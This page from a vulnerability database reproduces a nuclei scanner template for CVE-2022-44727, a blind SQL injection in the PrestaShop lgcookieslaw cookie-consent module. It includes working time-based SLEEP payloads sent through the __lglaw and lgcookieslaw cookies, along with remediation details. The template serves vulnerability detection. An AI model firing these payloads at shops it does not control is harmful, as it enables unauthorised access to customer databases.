Lucene search
K

PrestaShop lgcookieslaw - SQL Injection

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 18 Views

PrestaShop lgcookieslaw SQL injection (CVE-2022-44727) allows unauthenticated DB access via cookies.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2022-44727
13 Nov 202205:49
circl
CNNVD
PrestaShop SQL注入漏洞
10 Nov 202200:00
cnnvd
CVE
CVE-2022-44727
10 Nov 202200:00
cve
Cvelist
CVE-2022-44727
10 Nov 202200:00
cvelist
EUVD
EUVD-2022-47661
3 Oct 202520:07
euvd
NVD
CVE-2022-44727
10 Nov 202217:15
nvd
OSV
CVE-2022-44727
10 Nov 202217:15
osv
Prion
Sql injection
10 Nov 202217:15
prion
Positive Technologies
PT-2022-27286 · Prestashop · Eu Cookie Law Gdpr
10 Nov 202200:00
ptsecurity
RedhatCVE
CVE-2022-44727
23 May 202500:15
redhatcve
Rows per page
id: CVE-2022-44727

info:
  name: PrestaShop lgcookieslaw - SQL Injection
  author: mastercho
  severity: critical
  description: |
    The EU Cookie Law GDPR (Banner + Blocker) PrestaShop module before 2.1.3 allows blind SQL injection via the __lglaw or lgcookieslaw cookie used to store user consent choices.
  impact: |
    Successful exploitation allows unauthenticated attackers to read or modify the shop database, including customer PII and payment-related data.
  remediation: |
    Upgrade the lgcookieslaw module to version 2.1.3 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-44727
    - https://security.friendsofpresta.org/modules/2022/11/06/lgcookieslaw.html
    - https://web.archive.org/web/2/https://securityandstuff.com/posts/cve-2022-44727/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-44727
    epss-score: 0.02397
    epss-percentile: 0.81984
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 3
    vendor: lineagrafica
    product: eu_cookie_law_gdpr
    framework: prestashop
    shodan-query:
      - http.component:"Prestashop"
      - http.component:"prestashop"
  tags: cve,cve2022,prestashop,prestashop-module,sqli,time-based-sqli,lgcookieslaw,unauth

variables:
  rand_num: "{{rand_int(1000,9999)}}"
  lglaw_v1: "2,3,4,5) AND (SELECT {{rand_num}} FROM (SELECT(SLEEP(10)))vkBH) AND (9297=9297"
  lglaw_v2_json: "{\"lgcookieslaw_accepted_purposes\":\"[\\\"1\\\",\\\"2\\\",\\\"3\\\",\\\"4\\\",\\\"5) AND (SELECT {{rand_num}} FROM (SELECT(SLEEP(10)))vkBH) AND (9297=9297\\\"]\"}"
  lglaw_v2: "{{base64(lglaw_v2_json)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /modules/lgcookieslaw/views/css/front.css HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /modules/lgcookieslaw/views/js/front.js HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(tolower(body), 'lgcookieslaw')
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 20s
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Referer: {{RootURL}}
        Cookie: __lglaw={{lglaw_v1}}

      - |
        @timeout: 20s
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Referer: {{RootURL}}
        Cookie: lgcookieslaw={{lglaw_v2}}

    stop-at-first-match: true
    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        name: lglaw-v1-sqli
        dsl:
          - duration_1 >= 10
          - status_code_1 == 200
        condition: and
      - type: dsl
        name: lglaw-v2-sqli
        dsl:
          - duration_2 >= 10
          - status_code_2 == 200
        condition: and
# digest: 4a0a0047304502207aa8c3bad45d3765e82589fb4f7109dce1f8b83e0e10f87dc4631cfe0003fe5a0221008554cbfadb94b77aac5b9afbbcc2bd1153b5c2b5ae257b4d5fbe325b44852ad8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 May 2026 21:41Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.1
EPSS0.02397
SSVC
18